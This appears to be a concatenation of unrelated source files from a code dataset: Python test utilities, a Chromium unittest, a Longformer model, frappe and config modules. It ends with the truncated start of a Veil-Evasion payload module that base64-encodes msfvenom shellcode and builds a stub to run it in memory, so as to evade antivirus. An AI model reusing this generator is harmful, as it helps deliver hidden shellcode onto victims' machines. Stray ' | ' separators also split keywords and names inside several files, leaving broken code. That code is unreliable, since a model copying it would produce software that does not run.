    cleanup steps on exceptions, leaking the directory and leaving the
    process in a deleted-or-wrong cwd).
    """
    orig_workdir = os.getcwd()
    temp_workdir = tempfile.mkdtemp(*args, **kwargs)
    os.chdir(temp_workdir)
    try:
        yield temp_workdir
    finally:
        os.chdir(orig_workdir)
        shutil.rmtree(temp_workdir)
def _check_exception(expected, actual, exc_tb):
    # Verify that `actual` matches `expected`: a case-insensitive substring
    # match when `expected` is a string, otherwise an isinstance check.
    # On mismatch, six.reraise raises an AssertionError attached to the
    # original traceback so the failure points at the raising site.
    if isinstance(expected, six.string_types):
        if expected.lower() not in str(actual).lower():
            six.reraise(AssertionError, AssertionError(
                "Expected %s, but caught %s" % (
                    repr(expected), repr(actual)
                )
            ), exc_tb)
    else:
        if not isinstance(actual, expected):
            six.reraise(AssertionError, AssertionError(
                "Expected %s, but caught %s %s" % (
                    expected.__name__, actual.__class__.__name__, repr(actual)
                )
            ), exc_tb)
def raises(expected_exception, obj=None, *args, **kwargs):
    """
    Assert that a callable raises a specified exception.

    :expected_exception An exception class or a string. If a class, assert
    that an exception of this type is raised. If a string, assert that the
    string occurs in the string representation of the exception, based on a
    case-insensitive match.

    :obj A callable object. When omitted, a context manager is returned
    instead, for use as ``with raises(SomeError): ...``.

    :args Arguments to be passed to the callable.

    :kwargs Arguments to be passed to the callable.
    """
    if obj is None:
        return RaisesContext(expected_exception)
    else:
        try:
            ret = obj(*args, **kwargs)
        except Exception as actual:
            _check_exception(expected_exception, actual, sys.exc_info()[2])
        else:
            raise AssertionError("No exception raised. Return value: {}".format(ret))
class RaisesContext(object):
    """Context manager returned by raises() when called without a callable."""
    def __init__(self, expected_exception):
        self.expected_exception = expected_exception
    def __enter__(self):
        # Nothing to set up; all checking happens in __exit__.
        return
    def __exit__(self, exc_type, exc_val, exc_tb):
        if not exc_type:
            raise AssertionError("No exception raised.")
        else:
            _check_exception(self.expected_exception, exc_val, exc_tb)
        # Returning True suppresses the (expected) exception.
        return True
# Accessor for files in the netlib test data directory.
test_data = utils.Data(__name__)
# FIXME: Temporary workaround during repo merge.
test_data.dirname = os.path.join(test_data.dirname, "..", "test", "netlib")
def treq(**kwargs):
    """
    Build an HTTP request with sensible test defaults; any keyword argument
    overrides the corresponding netlib.http.Request constructor argument.

    Returns:
        netlib.http.Request
    """
    default = dict(
        first_line_format="relative",
        method=b"GET",
        scheme=b"http",
        host=b"address",
        port=22,
        path=b"/path",
        http_version=b"HTTP/1.1",
        headers=http.Headers(((b"header", b"qvalue"), (b"content-length", b"7"))),
        content=b"content"
    )
    default.update(kwargs)
    return http.Request(**default)
def tresp(**kwargs):
    """
    Build an HTTP response with test defaults; keyword arguments override
    individual netlib.http.Response constructor arguments.

    Returns:
        netlib.http.Response
    """
    defaults = {
        "http_version": b"HTTP/1.1",
        "status_code": 200,
        "reason": b"OK",
        "headers": http.Headers(((b"header-response", b"svalue"), (b"content-length", b"7"))),
        "content": b"message",
        # Two separate clock reads, as in the original.
        "timestamp_start": time.time(),
        "timestamp_end": time.time(),
    }
    defaults.update(kwargs)
    return http.Response(**defaults)
|
ChromiumWebApps/chromium | build/android/pylib/base/test_dispatcher_unittest.py | Python | bsd-3-clause | 7,737 | 0.007496 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for test_dispatcher.py."""
# pylint: disable=R0201
# pylint: disable=W0212
import os
import sys
import unittest
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),
os.pardir, os.pardir))
# Mock out android_commands.GetAttachedDevices().
from pylib import android_commands
android_commands.GetAttachedDevices = lambda: ['0', '1']
from pylib import constants
from pylib.base import base_test_result
from pylib.base import test_dispatcher
from pylib.utils import watchdog_timer
class TestException(Exception):
    """Sentinel exception raised by MockRunnerException to test re-raising."""
    pass
class MockRunner(object):
  """A mock TestRunner that passes every test and counts lifecycle calls."""
  def __init__(self, device='0', shard_index=0):
    self.device = device
    self.shard_index = shard_index
    self.setups = 0
    self.teardowns = 0
  def RunTest(self, test):
    run_results = base_test_result.TestRunResults()
    outcome = base_test_result.BaseTestResult(
        test, base_test_result.ResultType.PASS)
    run_results.AddResult(outcome)
    return (run_results, None)
  def SetUp(self):
    self.setups += 1
  def TearDown(self):
    self.teardowns += 1
class MockRunnerFail(MockRunner):
  # Variant whose RunTest always fails and returns the test for retry.
  def RunTest(self, test):
    results = base_test_result.TestRunResults()
    results.AddResult(
        base_test_result.BaseTestResult(test, base_test_result.ResultType.FAIL))
    return (results, test)
class MockRunnerFailTwice(MockRunner):
  """Fails every test on the first two attempts, then passes."""
  def __init__(self, device='0', shard_index=0):
    super(MockRunnerFailTwice, self).__init__(device, shard_index)
    self._fails = 0
  def RunTest(self, test):
    self._fails += 1
    still_failing = self._fails <= 2
    outcome = (base_test_result.ResultType.FAIL if still_failing
               else base_test_result.ResultType.PASS)
    results = base_test_result.TestRunResults()
    results.AddResult(base_test_result.BaseTestResult(test, outcome))
    # Returning the test signals the dispatcher to retry it.
    return (results, test if still_failing else None)
class MockRunnerException(MockRunner):
  # Variant whose RunTest raises, to test exception propagation.
  def RunTest(self, test):
    raise TestException
class TestFunctions(unittest.TestCase):
  """Tests test_dispatcher._RunTestsFromQueue.
  """
  @staticmethod
  def _RunTests(mock_runner, tests):
    # Drive _RunTestsFromQueue directly and merge the per-run results.
    results = []
    tests = test_dispatcher._TestCollection(
        [test_dispatcher._Test(t) for t in tests])
    test_dispatcher._RunTestsFromQueue(mock_runner, tests, results,
                                       watchdog_timer.WatchdogTimer(None), 2)
    run_results = base_test_result.TestRunResults()
    for r in results:
      run_results.AddTestRunResults(r)
    return run_results
  def testRunTestsFromQueue(self):
    results = TestFunctions._RunTests(MockRunner(), ['a', 'b'])
    self.assertEqual(len(results.GetPass()), 2)
    self.assertEqual(len(results.GetNotPass()), 0)
  def testRunTestsFromQueueRetry(self):
    # A runner that always fails: both tests end up as failures.
    results = TestFunctions._RunTests(MockRunnerFail(), ['a', 'b'])
    self.assertEqual(len(results.GetPass()), 0)
    self.assertEqual(len(results.GetFail()), 2)
  def testRunTestsFromQueueFailTwice(self):
    # Two failures trigger retries; the third attempt passes.
    results = TestFunctions._RunTests(MockRunnerFailTwice(), ['a', 'b'])
    self.assertEqual(len(results.GetPass()), 2)
    self.assertEqual(len(results.GetNotPass()), 0)
  def testSetUp(self):
    runners = []
    counter = test_dispatcher._ThreadSafeCounter()
    test_dispatcher._SetUp(MockRunner, '0', runners, counter)
    self.assertEqual(len(runners), 1)
    self.assertEqual(runners[0].setups, 1)
  def testThreadSafeCounter(self):
    counter = test_dispatcher._ThreadSafeCounter()
    for i in xrange(5):
      self.assertEqual(counter.GetAndIncrement(), i)
class TestThreadGroupFunctions(unittest.TestCase):
  """Tests test_dispatcher._RunAllTests and test_dispatcher._CreateRunners.

  NOTE: the testTearDown/testRetry boundary contained extraction-garbled
  characters and has been reconstructed.
  """
  def setUp(self):
    self.tests = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
    shared_test_collection = test_dispatcher._TestCollection(
        [test_dispatcher._Test(t) for t in self.tests])
    self.test_collection_factory = lambda: shared_test_collection
  def testCreate(self):
    runners = test_dispatcher._CreateRunners(MockRunner, ['0', '1'])
    for runner in runners:
      self.assertEqual(runner.setups, 1)
    self.assertEqual(set([r.device for r in runners]),
                     set(['0', '1']))
    self.assertEqual(set([r.shard_index for r in runners]),
                     set([0, 1]))
  def testRun(self):
    runners = [MockRunner('0'), MockRunner('1')]
    results, exit_code = test_dispatcher._RunAllTests(
        runners, self.test_collection_factory, 0)
    self.assertEqual(len(results.GetPass()), len(self.tests))
    self.assertEqual(exit_code, 0)
  def testTearDown(self):
    runners = [MockRunner('0'), MockRunner('1')]
    test_dispatcher._TearDownRunners(runners)
    for runner in runners:
      self.assertEqual(runner.teardowns, 1)
  def testRetry(self):
    runners = test_dispatcher._CreateRunners(MockRunnerFail, ['0', '1'])
    results, exit_code = test_dispatcher._RunAllTests(
        runners, self.test_collection_factory, 0)
    self.assertEqual(len(results.GetFail()), len(self.tests))
    self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
  def testReraise(self):
    runners = test_dispatcher._CreateRunners(MockRunnerException, ['0', '1'])
    with self.assertRaises(TestException):
      test_dispatcher._RunAllTests(runners, self.test_collection_factory, 0)
class TestShard(unittest.TestCase):
  """Tests test_dispatcher.RunTests with sharding."""

  @staticmethod
  def _RunShard(runner_factory):
    # Shard three tests across two devices.
    return test_dispatcher.RunTests(
        ['a', 'b', 'c'], runner_factory, ['0', '1'], shard=True)

  def testShard(self):
    results, exit_code = TestShard._RunShard(MockRunner)
    self.assertEqual(len(results.GetPass()), 3)
    self.assertEqual(exit_code, 0)

  def testFailing(self):
    results, exit_code = TestShard._RunShard(MockRunnerFail)
    self.assertEqual(len(results.GetPass()), 0)
    self.assertEqual(len(results.GetFail()), 3)
    self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)

  def testNoTests(self):
    # An empty test list is reported as an error, not a trivial success.
    results, exit_code = test_dispatcher.RunTests(
        [], MockRunner, ['0', '1'], shard=True)
    self.assertEqual(len(results.GetAll()), 0)
    self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)

  def testTestsRemainWithAllDevicesOffline(self):
    # Swap out GetAttachedDevices so no devices are visible; restore it in
    # a finally block so other tests are unaffected.
    attached_devices = android_commands.GetAttachedDevices
    android_commands.GetAttachedDevices = lambda: []
    try:
      with self.assertRaises(AssertionError):
        _results, _exit_code = TestShard._RunShard(MockRunner)
    finally:
      android_commands.GetAttachedDevices = attached_devices
class TestReplicate(unittest.TestCase):
  """Tests test_dispatcher.RunTests with replication."""

  @staticmethod
  def _RunReplicate(runner_factory):
    # shard=False replicates every test on every device.
    return test_dispatcher.RunTests(
        ['a', 'b', 'c'], runner_factory, ['0', '1'], shard=False)

  def testReplicate(self):
    results, exit_code = TestReplicate._RunReplicate(MockRunner)
    # We expect 6 results since each test should have been run on every device
    self.assertEqual(len(results.GetPass()), 6)
    self.assertEqual(exit_code, 0)

  def testFailing(self):
    results, exit_code = TestReplicate._RunReplicate(MockRunnerFail)
    self.assertEqual(len(results.GetPass()), 0)
    self.assertEqual(len(results.GetFail()), 6)
    self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)

  def testNoTests(self):
    # An empty test list is an error in replicate mode as well.
    results, exit_code = test_dispatcher.RunTests(
        [], MockRunner, ['0', '1'], shard=False)
    self.assertEqual(len(results.GetAll()), 0)
    self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
if __name__ == '__main__':
unittest.main()
|
google-research/long-range-arena | lra_benchmarks/models/longformer/longformer.py | Python | apache-2.0 | 13,102 | 0.001679 | # Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Longformer modules."""
from flax import nn
import jax.numpy as jnp
from lra_benchmarks.models.layers import common_layers
from lra_benchmarks.models.longformer import longformer_attention
class LongformerBlock(nn.Module):
  """Longformer Layer: pre-norm self-attention + MLP, each with a residual."""

  def apply(self,
            inputs,
            qkv_dim,
            mlp_dim,
            num_heads,
            sliding_window_size=512,
            global_mask=None,
            causal_mask=False,
            dtype=jnp.float32,
            inputs_segmentation=None,
            padding_mask=None,
            dropout_rate=0.1,
            attention_dropout_rate=0.1,
            deterministic=False):
    """Applies the LongformerBlock module.

    Args:
      inputs: input data of size `[bs, seq_len, features]`.
      qkv_dim: dimension of the query/key/value.
      mlp_dim: dimension of the mlp on top of attention block.
      num_heads: number of attention heads.
      sliding_window_size: size of sliding window attention to use.
      global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
        indicates that the position is globally attended. By default, no global
        attention is used.
      causal_mask: If true, apply causal attention mask.
      dtype: the dtype of the computation (default: float32).
      inputs_segmentation: input segmentation info for packed examples.
      padding_mask: bool, mask padding tokens.
      dropout_rate: dropout rate
      attention_dropout_rate: dropout rate for attention weights
      deterministic: if true, disable dropout (apply the module
        deterministically).

    Returns:
      output of shape `[bs, seq_len, mlp_dim]`.
    """
    assert inputs.ndim == 3
    # Pre-norm self-attention sub-layer with residual connection.
    x = nn.LayerNorm(inputs)
    x = longformer_attention.LongformerSelfAttention(
        x,
        num_heads=num_heads,
        qkv_features=qkv_dim,
        sliding_window_size=sliding_window_size,
        global_mask=global_mask,
        causal_mask=causal_mask,
        dtype=dtype,
        segmentation=inputs_segmentation,
        padding_mask=padding_mask,
        kernel_init=nn.initializers.xavier_uniform(),
        bias_init=nn.initializers.normal(stddev=1e-6),
        bias=False,
        broadcast_dropout=False,
        dropout_rate=attention_dropout_rate,
        deterministic=deterministic)
    x = nn.dropout(x, rate=dropout_rate, deterministic=deterministic)
    x = x + inputs
    # Pre-norm feed-forward sub-layer with residual connection.
    y = nn.LayerNorm(x)
    y = common_layers.MlpBlock(
        y,
        mlp_dim=mlp_dim,
        dtype=dtype,
        dropout_rate=dropout_rate,
        deterministic=deterministic)
    return x + y
class LongformerEncoder(nn.Module):
"""Longformer Encoder."""
def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
inputs_positions=None,
inputs_segmentation=None,
shared_embedding=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=512,
train=True,
dropout_rate=0.1,
attention_dropout_rate=0.1,
learn_pos_emb=False,
classifier=False,
classifier_pool='CLS',
num_classes=10):
"""Applies Longformer model on the inputs.
Args:
inputs: input data.
vocab_size: size of the vocabulary.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply cau | sal attention masking.
inputs_positions: input subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
shared_embedding: a shared em | bedding layer to use.
use_bfloat16: bool: whether use bfloat16.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: if it is training,
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
learn_pos_emb: boolean, if learn the positional embedding or use the
sinusoidal positional embedding.
classifier: boolean, for classification mode (output N-class logits)
classifier_pool: str, supports "MEAN", "MAX" pooling.
num_classes: int, number of classification classes.
Returns:
output of the encoder or logits if classifier_mode is true.
"""
assert inputs.ndim == 2 # (batch, len)
# Padding Masks
src_padding_mask = (inputs > 0)[..., None]
# Input Embedding
if shared_embedding is None:
input_embed = nn.Embed.partial(
num_embeddings=vocab_size,
features=emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
input_embed = shared_embedding
x = inputs.astype('int32')
x = input_embed(x)
if classifier and classifier_pool == 'CLS':
cls = self.param('cls', (1, 1, emb_dim), nn.initializers.zeros)
cls = jnp.tile(cls, [x.shape[0], 1, 1])
x = jnp.concatenate([cls, x], axis=1)
max_len += 1
src_padding_mask = jnp.concatenate(
[src_padding_mask[:, :1], src_padding_mask], axis=1)
pe_init = nn.initializers.normal(stddev=0.02) if learn_pos_emb else None
x = common_layers.AddPositionEmbs(
x,
inputs_positions=inputs_positions,
posemb_init=pe_init,
max_len=max_len,
name='posembed_input')
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
if use_bfloat16:
x = x.astype(jnp.bfloat16)
dtype = jnp.bfloat16
else:
dtype = jnp.float32
# Input Encoder
for lyr in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
inputs_segmentation=inputs_segmentation,
padding_mask=src_padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
name=f'encoderblock_{lyr}')
encoded = nn.LayerNorm(x, dtype=dtype, name='encoder_norm')
if classifier:
encoded = common_layers.classifier_head(
encoded, num_classes, mlp_dim, pooling_mode=classifier_pool)
return encoded
class LongformerDualEncoder(nn.Module):
"""Longformer Model for Matching (dual encoding) tasks."""
def apply(self,
inputs1,
inputs2,
vocab_size=None,
inputs1_positions=None,
inputs2_positions=None,
inputs1_segmentation=None,
inputs2_segmentation=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
dropout_rate=0.1,
attention_dropout_rate=0.1,
classifier=True,
classifier_pool='CLS',
num_classes=2,
interaction |
ravenac95/testkit | tests/test_context.py | Python | mit | 2,056 | 0.002432 | from testkit.context import *
def test_context_user():
    """ContextUser drives a context manager via explicit enter()/exit()."""
    from contextlib import contextmanager
    test_dict = dict(value='before')

    @contextmanager
    def test_context(test_dict):
        test_dict['value'] = 'during'
        yield 'test'
        test_dict['value'] = 'after'

    ctx = ContextUser(test_context(test_dict))
    # Nothing runs until enter() is called explicitly.
    assert test_dict['value'] == 'before'
    ctx.enter()
    assert test_dict['value'] == 'during'
    ctx.exit()
    assert test_dict['value'] == 'after'
class my_context(ContextDecorator):
    """Minimal ContextDecorator: exposes a value and a completion flag."""

    def before(self):
        # Entry hook: mark as not finished and expose a test value.
        self.done = False
        self.hello = 'hello'

    def after(self):
        # Exit hook: runs on both normal and exceptional exit.
        self.done = True
def test_context_decorator_as_decorator():
    """Using the instance as a decorator passes the context to the function."""
    as_decorator = my_context()

    @as_decorator
    def hello(context):
        assert context.hello == 'hello'

    hello()
    # after() must have run once the decorated call returns.
    assert as_decorator.done == True
def test_context_decorator_as_decorator_exception():
as_decorator = my_context()
fake_message = 'A fake error!'
@as_decorator
| def hello(context):
raise Exception(fake_message)
try:
hello()
except Exception, e:
assert e.message == fake_message
assert as_decorator.done == True
def test_context_decorator_as_context():
    """Using the instance in a with-statement yields the context object."""
    as_context = my_context()
    with as_context as context:
        assert context.hello == 'hello'
        # Still inside the block: after() has not run yet.
        assert context.done == False
    assert context.done == True
def test_context_decorator_as_context_exception():
    """after() runs even when the with-block raises; the exception escapes."""
    as_context = my_context()
    fake_message = 'error!'
    try:
        with as_context as context:
            raise Exception(fake_message)
    except Exception, e:
        assert e.message == fake_message
    assert context.done == True
class my_other_context(ContextDecorator):
    """Like my_context, but before() returns a custom context value."""

    def before(self):
        self.hello = 'hello'
        self.done = False
        # The return value is what `with ... as x` binds.
        return self.hello

    def after(self):
        self.done = True
def test_context_decorator_before_returns_custom_context():
    """Whatever before() returns is bound by the with-statement."""
    as_context = my_other_context()
    with as_context as hello:
        assert hello == 'hello'
gvalkov/git-link | tests/test_gitweb.py | Python | bsd-3-clause | 2,301 | 0.00565 | #!/usr/bin/env python
# encoding: utf-8
from util import *
res = [
# commit
('90f02cb510335a5bfdb57f0c78915d5ac236013c',
'http://git.naquadah.org/?p=oocairo.git;a=commitdiff;h=90f02cb510335a5bfdb57f0c78915d5ac236013c'),
# tree
('90f02cb510335a5bfdb57f0c78915d5ac236013c^{tree}',
'http://git.naquadah.org/?p=oocairo.git;a=tree;h=7d0f2011b9aa9343cf3ae6675416ddcbfddab7e9'),
# branch
('master',
'http://git.naquadah.org/?p=oocairo.git;a=shortlog;h=master'),
# tag by name
('v1.4',
'http://git.naquadah.org/?p=oocairo.git;a=commit;h=v1.4'),
# tab by sha
('f8e35c47ddb48dfeffb1f80cf523ba3207b31aa1',
'http://git.naquadah.org/?p=oocairo.git;a=commit;h=v1.3'),
# file path (HEAD)
('test/context.lua',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=472061f27b61d2bcba7a7dc75743a0e8db1a4e4c;f=test/context.lua'),
# dir path (HEAD)
('test/',
'http://git.naquadah.org/?p=oocairo.git;a=tree;f=test;h=8e941a88c606930750c98fc10927b17f0588cc8d'),
# blob with tag
('v1.4:Changes',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=5a2f18eac98afb6a601369f5fa867cd0d386b266;f=Changes'),
# blob with commit
('47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=f90b1e3f8284f6a94f36919219acc575d9362e10;f=COPYRIGHT'),
# raw blob with commit
('-r 47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob_plain;h=f90b1e3f8284f6a94f36919219acc575d9362e10;f=COPYRIGHT'),
# raw blob with commit (short)
('-s 7 -r 47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob_plain;h=f90b1e3;f=COPYRIGHT'),
]
# Remote repository URL, the gitweb base it maps to, and the sha of the
# repository HEAD the expected URLs were generated against. (The sha
# literal was corrupted by a stray extraction separator; restored to a
# contiguous 40-character hex digest.)
url = 'http://git.naquadah.org/git/oocairo.git'
linkurl = 'http://git.naquadah.org/?p=oocairo.git'
headrev = '2b40c79192e3c86074d21af51774971e19cbd2ab'
@pytest.fixture
def gitlink(request):
    # Build the library-level and executable-level link generators for the
    # gitweb handler against the oocairo test repository. (The decorator
    # line was corrupted by a stray extraction separator; restored.)
    return mk_gitlink(url, 'gitweb', 'gitweb', linkurl, headrev)
@mark.parametrize(('cmdargs', 'expect'), res)
def test_gitweb_auto_lib(gitlink, cmdargs, expect):
    """Library entry point: each command line maps to the expected gitweb URL."""
    assert gitlink[0](cmdargs) == expect
    # The generated URL should also resolve (no 404) on the live server.
    assert validate_url_404(expect)
@skipif_no_gitlink
@mark.parametrize(('cmdargs', 'expect'), res)
def test_gitweb_auto_exe(gitlink, cmdargs, expect):
    """Installed executable produces the same URLs as the library."""
    assert gitlink[1](cmdargs) == expect
    assert validate_url_404(expect)
|
saurabh6790/frappe | frappe/core/doctype/role/role.py | Python | mit | 2,874 | 0.02366 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document impo | rt Document
desk_properties = ("search_bar", "notifications", "chat", "list_sidebar",
"bulk_actions", "view_switcher", "form_sidebar", "timeline", "dashboard")
class Role(Document):
    """Role document: protects built-in roles and syncs desk access to users."""

    def before_rename(self, old, new, merge=False):
        # Built-in roles are referenced by name across the framework.
        protected = ("Guest", "Administrator", "System Manager", "All")
        if old in protected:
            frappe.throw(frappe._("Standard roles cannot be renamed"))

    def after_insert(self):
        # Drop the cached role list for Administrator.
        frappe.cache().hdel('roles', 'Administrator')

    def validate(self):
        if not self.disabled:
            self.set_desk_properties()
        else:
            self.disable_role()

    def disable_role(self):
        protected = ("Guest", "Administrator", "System Manager", "All")
        if self.name in protected:
            frappe.throw(frappe._("Standard roles cannot be disabled"))
        else:
            self.remove_roles()

    def set_desk_properties(self):
        # Guest never gets desk access; without desk access every desk
        # property flag is cleared.
        if self.name == 'Guest':
            self.desk_access = 0
        if not self.desk_access:
            for prop in desk_properties:
                self.set(prop, 0)

    def remove_roles(self):
        frappe.db.sql("delete from `tabHas Role` where role = %s", self.name)
        frappe.clear_cache()

    def on_update(self):
        '''update system user desk access if this has changed in this update'''
        if frappe.flags.in_install:
            return
        if not self.has_value_changed('desk_access'):
            return
        for name in get_users(self.name):
            user = frappe.get_doc('User', name)
            previous_type = user.user_type
            user.set_system_user()
            if previous_type != user.user_type:
                user.save()
def get_info_based_on_role(role, field='email'):
    ''' Get information of all users that have been assigned this role '''
    assignments = frappe.get_list(
        "Has Role",
        filters={"role": role, "parenttype": "User"},
        fields=["parent as user_name"])
    return get_user_info(assignments, field)
def get_user_info(users, field='email'):
    ''' Fetch details about users for the specified field '''
    excluded = ["admin@example.com", "guest@example.com"]
    collected = []
    for entry in users:
        value, enabled = frappe.db.get_value(
            "User", entry.get("user_name"), [field, "enabled"])
        # Skip disabled accounts and the stock example users.
        if not enabled:
            continue
        if value in excluded:
            continue
        collected.append(value)
    return collected
def get_users(role):
    """Return the names of all users that have *role* assigned."""
    rows = frappe.get_all(
        "Has Role",
        filters={"role": role, "parenttype": "User"},
        fields=["parent"])
    return [row.parent for row in rows]
# Link-field search query for standard (non-custom) roles.
@frappe.whitelist()
@frappe.validate_and_sanitize_search_inputs
def role_query(doctype, txt, searchfield, start, page_len, filters):
    """Return standard roles whose name matches *txt*, as rows of lists.

    Extra list-style filters supplied by the client are appended to the
    built-in name/is_custom conditions before querying.
    """
    report_filters = [['Role', 'name', 'like', '%{}%'.format(txt)], ['Role', 'is_custom', '=', 0]]
    if filters and isinstance(filters, list):
        report_filters.extend(filters)
    return frappe.get_all('Role', limit_start=start, limit_page_length=page_len,
                          filters=report_filters, as_list=1)
ciappi/Yaranullin | yaranullin/config.py | Python | isc | 2,801 | 0.000357 | # yaranullin/config.py
#
# Copyright (c) 2012 Marco Scopesi <marco.scopesi@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Global configuration."""
import os
import sys
import ConfigParser
import platform

# Global information
__version__ = '0.5.0'
__platform__ = platform.system()

# Locate the user's home directory; Windows may only expose HOMEDRIVE/HOMEPATH.
if 'HOME' in os.environ:
    HOME_DIR = os.environ['HOME']
elif __platform__ == 'Windows':
    HOME_DIR = os.path.join(os.environ['HOMEDRIVE'],
                            os.environ['HOMEPATH'])
else:
    sys.exit('Cannot find home folder')

# Per-user data folder (hidden on non-Windows platforms).
if __platform__ == 'Windows':
    YR_DIR = os.path.join(HOME_DIR, 'yaranullin')
else:
    YR_DIR = os.path.join(HOME_DIR, '.yaranullin')

# Resource and save folders, created on demand (existing ones are kept).
YR_FONT_DIR = os.path.join(YR_DIR, 'fonts')
YR_CACHE_DIR = os.path.join(YR_DIR, 'cache')
YR_SAVE_DIR = os.path.join(YR_DIR, 'saves')
for _folder in (YR_FONT_DIR, YR_CACHE_DIR, YR_SAVE_DIR):
    try:
        os.makedirs(_folder)
    except OSError:
        pass

# Installed config file.
MAIN_CONFIG_FILE = os.path.join(sys.prefix, 'share', 'yaranullin',
                                'yaranullin.ini')
# If there is no installed config file, we assume to be in the source folder.
if not os.path.exists(MAIN_CONFIG_FILE):
    MAIN_CONFIG_FILE = os.path.join(os.path.split(
        os.path.dirname(__file__))[0], 'data', 'yaranullin.ini')

# Global configuration object; the main config file is mandatory.
CONFIG = ConfigParser.RawConfigParser(allow_no_value=True)
try:
    CONFIG.readfp(open(MAIN_CONFIG_FILE))
except IOError as why:
    # errno 2 == file not found; anything else is unexpected.
    if why.errno == 2:
        sys.exit("Unable to find main configuration file")
    raise
except ConfigParser.Error:
    sys.exit('Unable to parse main configuration file')

# Optional user overrides on top of the main configuration.
USER_CONFIG_FILE = os.path.join(YR_DIR, 'yaranullin.ini')
CONFIG.read(USER_CONFIG_FILE)

# Log files
LOG_FILE_CLIENT = os.path.join(YR_DIR, 'client.log')
LOG_FILE_SERVER = os.path.join(YR_DIR, 'server.log')
LOG_FILE_EDITOR = os.path.join(YR_DIR, 'editor.log')
g0tmi1k/veil-Evasion | modules/payloads/python/shellcode_inject/base64_substitution.py | Python | gpl-3.0 | 16,041 | 0.00374 | """
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
    # Required metadata consumed by the Veil framework when listing payloads.
    self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
    self.language = "python"
    self.extension = "py"
    self.rating = "Excellent"
    # msfvenom-backed shellcode generator used by generate().
    self.shellcode = shellcode.Shellcode()
    # Options we require user interaction for - format is {OPTION: [Value, Description]}
    self.required_options = {
        "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
        "USE_PYHERION" : ["N", "Use the pyherion encrypter"],
        "INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
        "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
    }
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Gener | ate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
| RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
